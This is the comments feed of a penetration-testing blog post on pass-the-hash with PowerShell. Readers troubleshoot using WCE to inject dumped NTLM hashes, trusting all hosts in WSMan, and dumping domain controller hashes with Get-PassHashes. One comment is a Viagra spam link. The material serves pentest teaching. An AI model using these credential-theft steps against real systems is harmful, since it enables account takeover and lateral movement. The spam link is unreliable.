tag:blogger.com,1999:blog-8135211063584500909.post384218029255308465..comments2023-10-02T15:18:02.659+05:30Comments on Lab of a Penetration Tester: Poshing the hashes: Using PowerShell to play with hashesNikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.comBlogger18125tag:blogger.com,1999:blog-8135211063584500909.post-89160501416843989852017-04-18T08:50:40.096+05:302017-04-18T08:50:40.096+05:30This comment has been removed by the author.Anonymoushttps://www.blogger.com/profile/03222186550150751164noreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-2701730751036153892015-07-22T15:02:43.015+05:302015-07-22T15:02:43.015+05:30While inside the ambitious setting, every newly co...While inside the ambitious setting, every newly coming interconnection reasons the most well-known partially link with become taken out (can change this habits for you to hit-or-miss drop mode).<br /><a href="http://www.safeformens.com/viagra_generic.html" rel="nofollow">Buy Generic Viagra</a>jones brucehttps://www.blogger.com/profile/05993741837740198150noreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-57842385102190012842014-10-28T18:24:27.756+05:302014-10-28T18:24:27.756+05:30Have you tried Get-PassHashes? It should do the jo...Have you tried Get-PassHashes? It should do the job.Nikhil SamratAshok Mittalhttps://www.blogger.com/profile/02092541175521734123noreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-31344770123674128672014-10-28T15:28:45.250+05:302014-10-28T15:28:45.250+05:30is there a way to dump hashes from a w2k12 dc with...is there a way to dump hashes from a w2k12 dc with powershell?Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-46233862014622578752014-08-29T12:28:13.860+05:302014-08-29T12:28:13.860+05:30Are you using the bulit-in Administrator account? ...Are you using the bulit-in Administrator account? This could be because of KB2871997 and KB2928120. See the update.Nikhil SamratAshok Mittalhttps://www.blogger.com/profile/02092541175521734123noreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-40028537920938798292014-08-28T07:30:26.370+05:302014-08-28T07:30:26.370+05:30My tests weren't successful but the event log ...My tests weren't successful but the event log indicates that the right target user is trying to access which is a start. I get the following event log<br /><br />Logon Type: 3<br /><br />Account For Which Logon Failed:<br /> Security ID: NULL SID<br /> Account Name: user<br /> Account Domain: TARGET<br /><br />Failure Information:<br /> Failure Reason: Unknown user name or bad password.<br /> Status: 0xC000006D<br /> Sub Status: 0xC000006A<br /><br />Process Information:<br /> Caller Process ID: 0x0<br /> Caller Process Name: -<br /><br />Network Information:<br /> Workstation Name: ATTACKER<br /> Source Network Address: -<br /> Source Port: -<br /><br />Detailed Authentication Information:<br /> Logon Process: NtLmSsp <br /> Authentication Package: NTLM<br /> Transited Services: -<br /> Package Name (NTLM only): -<br /> Key Length: 0Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-61470272571427477352014-08-26T09:39:18.910+05:302014-08-26T09:39:18.910+05:30It works fine with non-domain machines. You just n...It works fine with non-domain machines. You just need to trust the target machine. Use this on your (attacking) machine:<br />Set-Item wsman:localhost\client\trustedhosts -Value <br />Nikhil SamratAshok Mittalhttps://www.blogger.com/profile/02092541175521734123noreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-43405153222603174162014-08-26T01:38:24.634+05:302014-08-26T01:38:24.634+05:30Anyone tried this across non domain joined machine...Anyone tried this across non domain joined machines ? I'm interested in making this work on Azure VM.Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-18443363289547879192013-11-22T01:24:34.125+05:302013-11-22T01:24:34.125+05:30Hey Nikhil, you were absolutely right. I downloade...Hey Nikhil, you were absolutely right. I downloaded the universal version and it works a treat. Thank you very much.Bridgey the Geekhttps://www.blogger.com/profile/02914850785489936225noreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-26125814019735533322013-11-21T10:02:51.822+05:302013-11-21T10:02:51.822+05:30Thank you for reading my post!
Looks like you are...Thank you for reading my post!<br /><br />Looks like you are running 32-bit version of WCE from a 64-bit machine. Try using the 64 bit version (or universal version). Please let me know if this sovles your problem. Nikhil SamratAshok Mittalhttps://www.blogger.com/profile/02092541175521734123noreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-66966782376915346112013-11-21T04:16:02.246+05:302013-11-21T04:16:02.246+05:30Thank you so much for such interesting posts. I...Thank you so much for such interesting posts. I'm trying to follow along but I'm getting the most frustrating error when I try to use wce.exe. I have Google-d high and low, but nobody seems to have the same problem as me:<br /><br />C:\tools\wce_v1_3beta>wce.exe<br />WCE v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)<br />Use -h for help.<br /><br />CrossSessionCreateRemoteThread: Cannot create new thread<br /><br />I'm hoping you can shed some light on this error?! It happens no matter what options I pass to wce. FYI, I am running the command from an Administrator's command prompt. Thank you.Bridgey the Geekhttps://www.blogger.com/profile/02914850785489936225noreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-78285292957035956622013-09-18T02:11:02.394+05:302013-09-18T02:11:02.394+05:30Yup-- you mentioned this in your article. I'v...Yup-- you mentioned this in your article. I've added the value " * " and I've also tried with the specific name of the target, and I was prompted with a [Y] or [N] to make sure I wanted to add the target machine. But once I start the WCE session and try to Enter-PSSession I'm still getting the same login failure error.<br /><br />Very interesting!Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-4496197676329772482013-09-17T10:28:26.848+05:302013-09-17T10:28:26.848+05:30Ok, ome more thing (and if it solves your problem ...Ok, ome more thing (and if it solves your problem than its my fault for not mentioning it in the post). You have to trust the target by using this from an elevated powershell:<br /><br />Set-Item WSMan:\localhost\Client\TrustedHosts -value <br /><br />or to trust all target computers<br /><br />Set-Item WSMan:\localhost\Client\TrustedHosts -value *Nikhil SamratAshok Mittalhttps://www.blogger.com/profile/02092541175521734123noreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-73829348877391618432013-09-17T01:29:08.561+05:302013-09-17T01:29:08.561+05:30That's how I was using it: ROB:DOMAIN:LM:NT ...That's how I was using it: ROB:DOMAIN:LM:NT :)<br /><br />No luck thus far... very strange!Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-28807131624625107612013-09-16T23:48:27.731+05:302013-09-16T23:48:27.731+05:30No problem.
Can you do one quick check? While usi...No problem.<br /><br />Can you do one quick check? While using WCE use the hash in this format<br /><br />.\wce.exe -s Rob::LM:NT<br /><br />Unlike, screenshot in above post which shows<br />.\wce.exe -s Rob:.:LM:NTNikhil SamratAshok Mittalhttps://www.blogger.com/profile/02092541175521734123noreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-37561063769531105572013-09-16T23:28:53.887+05:302013-09-16T23:28:53.887+05:30Thanks for the quick response, Nikhil! I hope you...Thanks for the quick response, Nikhil! I hope you had a great weekend.<br /><br />I've tried running through the steps again and here's some additional information: I've successfully dumped the hash via WCE and used the -s and -c switches to fire up the new powershell console. My screen looks similar to your step-by-step screenshots-- my powershell console shows that info for the new logon session using NTLM credentials...<br /><br />I've used your script to see if I can connect to the target machine and everything is good. When I try the Enter-PSSession with no crendetial switch, I get the following error: "Connecting to remote server failed with the following message: Logon failure: unknown user name or bad password." <br /><br />It looks like there is some sort of issue with the new logon session using the LMHash and NTHash I got from WCE... Interesting!<br /><br />Thanks again for your input and time-- much appreciated!Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-42893826575436405362013-09-13T11:35:49.758+05:302013-09-13T11:35:49.758+05:30Hi Rob,
That is strange. I never faced such an is...Hi Rob,<br /><br />That is strange. I never faced such an issue. Even if you have no admin access on remote machine it would say "Access Denied" or throw some error. I have not seen the WCE-started session asking for credentials. Are you sure you are not using the -Credential parameter with Enter-PSSession? Have you tried using Invoke-Command? Very unlikely, but this *may* happen if you are trying to connect from v3 to v2.<br /><br />If the problems persists give me more details and we would try to resolve it together.<br /><br />ThanksNikhil SamratAshok Mittalhttps://www.blogger.com/profile/02092541175521734123noreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-91617536709283571232013-09-13T04:37:31.487+05:302013-09-13T04:37:31.487+05:30Hi, Nikhil! Very cool stuff you have here.
I'...Hi, Nikhil! Very cool stuff you have here.<br /><br />I've tried replicating your implementation on Windows 8 (PowerShell 3.0), Windows 2008 R2 (PowerShell 2.0), and on a Windows 7 box running PowerShell 2.0.<br /><br />I've had the best luck with Windows 7 but am running into an issue once I try to Enter-PSSession from the WCE-started PowerShell session: Once I feed the target machine I immediately get prompted with a credentials box. I can of course, manually insert my username and password and then proceed to invoke commands on the target machine... but in your example, you were able to remotely connect with just the -computername from the WCE shell.<br /><br />Any thoughts on this? I poked around on MSDN and made sure that my account (who's hashed credentials I'm using) is an admin on the target box.<br /><br />Thanks a bunch!<br />- RobTragedyhttps://www.blogger.com/profile/09936226821131646468noreply@blogger.com